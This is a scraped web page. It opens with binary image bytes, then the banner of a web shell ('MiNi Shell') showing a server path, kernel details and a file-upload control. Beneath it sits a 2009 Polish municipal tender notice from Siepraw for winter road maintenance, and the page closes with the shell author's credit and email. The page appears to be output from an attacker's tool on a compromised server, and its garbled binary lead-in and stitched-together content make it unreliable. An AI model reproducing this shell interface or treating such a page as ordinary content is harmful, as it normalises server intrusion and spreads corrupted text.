JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/184385-N-2009.html

<p class="kh_header"><b>Siepraw: Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach gminnych w Gminie Siepraw 2009/2010r</b><br>
<b>Numer ogłoszenia: 184385 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Siepraw 1, 32-447 Siepraw, woj. małopolskie, tel. 012 2746299, faks 012 3721806.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siepraw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach gminnych w Gminie Siepraw 2009/2010r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1Przedmiotem zamówienia jest wykonywanie usług zimowego utrzymania dróg gminnych na terenie Gminy Siepraw, w tym usług zwalczania gołoledzi i odśnieżania zgodnie z wymogami technicznymi określonymi w załączniku Nr 7 SIWZ i standardem określonym w załączniku Nr 8 do SIWZ. 3.2 Długość dróg przewidziana do zimowego utrzymania to 54,98 km. 3.3 Wykaz dróg, parkingów, placów, na których wykonywane będą usługi oraz kolejność wykonywania usług dotyczących odśnieżania i usuwania śliskości i gołoledzi zawiera załącznik nr 6 do SIWZ. Wykonawca zapewnia materiały do posypywania dróg. 3.4 Zakres usług jest ściśle uzależniony od warunków atmosferycznych. 3.5 Zamawiający będzie żądał od Wykonawcy posiadania środków łączności  telefonicznej dla komunikowania się pracownika Urzędu Gminy z kierowcami pracującymi w terenie i pełniącymi dyżur. 3.6 Zaleca się aby Wykonawca dokonał wizji lokalnej terenu celem uzyskania wszelkich danych dotyczących stanu technicznego i szerokości dróg, które mogą być niezbędne w przygotowaniu oferty i podpisania umowy na wykonanie usług związanych z zimowym utrzymaniem dróg w Gminie Siepraw. 3.7 Wykonawca ponosi pełną odpowiedzialność za szkody (wypadki, kolizje drogowe) spowodowane zaniechaniem prac lub na skutek niedostatecznego, niezgodnego z obowiązującymi przepisami i warunkami podanymi w specyfikacji wykonywanie usług przy zimowym utrzymaniu dróg.
3.8. Szczegółowy zakres zamówienia jest następujący:
- rozliczenie finansowe odbywać się będzie w układzie miesiąca kalendarzowego.
- akcja zimowego utrzymania dróg w sezonie zimowym 2009/2010 odbywać się będzie w okresie od 15.11.2009r., do 15.03.2010r.
- maksymalna wartość zamówienia to cena miesięcznego ryczałtu wynikająca z oferty pomnożona przez 4 miesiące. Zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe za każdy miesiąc kalendarzowy realizacji usług będących przedmiotem zamówienia wg ceny wynikającej z oferty.
- Zamawiający na swój koszt zamontuje i zdemontuje GPS na sprzęcie Wykonawcy używanym do wykonywania usług w ilości 4 szt. 
- Wynagrodzenie będzie płatne w okresach miesięcznych kalendarzowych na podstawie zweryfikowanych przez Zamawiającego faktur, GPS zamontowane na sprzęcie zimowym będą elementem potwierdzającym rodzaj i czas pracy sprzętu Wykonawcy.
- W przypadku konieczności użycia większej ilości sprzętu nie wyposażonych GPS Wykonawca jest zobowiązany do prowadzenia szczegółowej dokumentacji wykonywania usług tj. daty i godziny wykonywania usług, liczby km, nazwy drogi, do wykonania usług i rodzaju wykonywanych usług - w przypadku wykonywania usługi na drogach gminnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 4000 zł (słownie; cztery tysiące złotych),  do dnia 28.10.2009r., do godz. 1100.
11.2. W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku z następujących form:
a. pieniądzu,
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c. gwarancjach bankowych,
d. gwarancjach ubezpieczeniowych,
e. poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9.11.2000r., o utworzeniu PARP (Dz. U. Nr 109 poz. 1158 z późn. zm.).
11.3	Za termin wniesienia wadium przelewem w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr KBS o-SIEPRAW nr 59 85910007 0240 0000 0228 0006 z dopiskiem: Przetarg nieograniczony Nr GII.341-13/2009 Zimowe utrzymanie dróg - odśnieżanie i usuwanie gołoledzi na drogach gminnych w Gminie Siepraw 2009/2010r.,
11.4	Potwierdzeniem wniesienia wadium w pieniądzu będzie kopia przelewu (wpłaty) załączona do oferty. 
11.5	Potwierdzenie wniesienia wadium w pozostałych formach załączyć należy do oferty oryginał, załączony w sposób luźny, tzn. nie trwale związany z ofertą. Równocześnie do oferty należy załączyć kserokopię potwierdzoną za zgodność z oryginałem potwierdzenie wniesienia wadium, wpięte do oferty. 
11.6	Wadium zostanie zwrócone, jeżeli;
a) upłynął termin związania z ofertą, 
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczanie należytego wykonania tej umowy,
c) zamawiający unieważnił postępowanie o udzielnie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Ponadto;
 Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy;
- który wycofał ofertę przed upływem terminu składania ofert, 
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
11.7	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.8	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo Zamówień Publicznych nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie (art.46 ust. 4a ustawy Prawo Zamówień Publicznych).
11.9	Gwarancja poręczenia nie może wygasać przed końcem okresu związania z ofertą podanego w pkt. 12 SIWZ.
11.10	Zamawiający zatrzymuje wadium jeżeli Wykonawca, którego oferta została wybrana;
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
11.11. Oferta niezabezpieczona wadium w wymaganym terminie, spowoduje wykluczenie Wykonawcy przez Zamawiającego.
11.12. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:

1. Posiadają uprawnienia do wykonania określonej działalności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:

- posiadają aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej,

2. POSIADAJĄ NIEZBĘDNĄ WIEDZĘ I DOŚWIADCZENIE ORAZ DYSPONUJĄ POTENCJAŁEM TECHNICZNYM I OSOBAMI ZDOLNYMI DO WYKONANIA ZAMÓWIENIA, tj.:
a) dysponują potencjałem technicznym do prawidłowej realizacji zamówienia, co najmniej:
- 2 pługo-piaskarki do odśnieżania dróg (min. 1 samochód ciężarowy wyposażony w pług odśnieżny + posyp),
- 2 piaskarki do zwalczania gołoledzi,
- 1 koparko spycharka,
- ładowacz lub inny podobny sprzęt mechaniczny do załadowania mieszanki - 1 szt,
- w razie wystąpienia obfitych opadów śniegu (zawieje, zamiecie śnieżne) możliwość  użycia sprzętu ciężkiego np. ciągnik gąsienicowy DT, koparko-spycharka,
lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego potencjału technicznego. Zgodnie z art. 22 ust. 1 pkt 2 ustawy Wykonawca może przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego do wykonania zamówienia.
b) posiadają niezbędną wiedzę i doświadczenie, tzn. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali minimum jedno zamówienie odpowiadające swoim rodzajem i wartościom przedmiotowi Zamówienia, tj. udokumentuje, że przez co najmniej jeden sezon zimowy (od listopada do marca) wykonywał prace związane z zimowym utrzymaniem 25 km dróg publicznych minimum gminnych. Wykazane zamówienie musi być poparte dokumentami potwierdzającymi, że zostało wykonane z należytą starannością wraz z opisem, podaniem jego zakresu, wartości, oraz daty i miejsca wykonania (potwierdzeniem są m.in. referencje, protokół odbioru). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww. warunki.

3. ZNAJDUJĄ SIĘ W SYTUACJI EKONOMICZNEJ I FINANSOWEJ ZAPEWNIAJĄCEJ WYKONANIE ZAMÓWIENIA, tj. 
- posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.

4. NIE PODLEGAJĄ WYKLUCZENIU Z POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA, tj.:
- posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Prawo Zamówień Publicznych.

8.2.	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia w oparciu o dokumenty załączone do oferty, a których wykaz zawiera punkt 9 do SIWZ. Dokumenty dołączone do oferty winny być podpisane przez osobę (osoby) upoważnioną (upoważnione) do reprezentowania Wykonawcy na zewnątrz. Upoważnienie do podpisania oferty powinno być dołączone do oferty, o ile nie wynika bezpośrednio z innych dokumentów załączonych do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla warunków określonych w pkt. 8.1 ppkt. 1 - 4 wykonawca zobowiązany jest dołączyć oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z wykorzystaniem wzoru - załącznik nr 2 do SIWZ Wymagana forma - oryginał. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, należy złożyć wspólne oświadczenie podpisane przez każdego z tych Wykonawców lub przez Pełnomocnika upoważnionego do reprezentowania ich w postępowaniu, lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
2.1. Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Z dokumentu powinno wynikać, kto jest upoważniony do podpisywania ofert (zaciągania zobowiązań). Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

3. W celu potwierdzenia posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda dołączenia do oferty następujących dokumentów:
3.1. Wykazu niezbędnego do wykonania zamówienia sprzętu, którym dysponuje lub będzie dysponował wykonawca zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2a SIWZ, zgodnie z załącznikiem nr 3 do SIWZ. 
Wymagana forma - oryginał.
3.1.1. Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu, jeżeli w wykazie, o którym mowa w pkt. 3.1 (załącznik nr 3 do siwz) wykonawca wskazał sprzęt, którym będzie dysponował.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.
3.2. Wykazu wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowanych zamówień zimowego utrzymania dróg zgodnie z warunkiem określonym w punkcie 8.1 ppkt. 2b SIWZ, zgodnie z załącznikiem nr 4 do SIWZ.
Wymagana forma - oryginał.
3.2.1.Wykazane zamówienia muszą być poparte dokumentami potwierdzającymi, że zostały wykonane z należytą starannością wraz z opisem, podaniem ich zakresu, wartości, oraz daty i miejsca wykonania.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
4.1. Polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

5. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych, zwanej dalej ustawą, zamawiający żąda od wykonawców dołączenia do oferty następujących dokumentów:
5.1. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy Prawo Zamówień Publicznych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny. W tym celu dokumenty określone w pkt. 3.1 ÷ 3.2 ma obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich Wykonawców będą spełniać warunki udziału określone w punkcie 8.1. ppkt  2 SIWZ.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w przypadku konsorcjum) winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich wykonawców w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2. Jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego pełnomocnika do przedstawienia umowy regulującej współpracę tych wykonawców.
Wymagana forma - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę
3. Wszelka korespondencja, oświadczenia, wnioski adresowane będą do Pełnomocnika ze skutkiem wobec wszystkich Wykonawców. 
4. Wykonawcy wspólnie ubiegający się o zamówienie:
1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia,
2)  zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum,
3)  zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Przyjmuje się że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów.
Podwykonawcy.
1. W przypadku realizacji zamówienia przy współudziale podwykonawców Wykonawca musi   załączyć do oferty szczegółowy   wykaz   zakresu   robót,   których   wykonanie Wykonawca   zamierza   powierzyć podwykonawcom zgodnie ze wzorem stanowiącym załącznik nr 9 do SIWZ.
Wymagana forma - oryginał..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siepraw 32-447 Siepraw 1 pokój nr 28, fax 012 3721806.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2009 godzina 11:00, miejsce: Urząd Gminy Siepraw 32-447 Siepraw 1 pokój nr 28..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com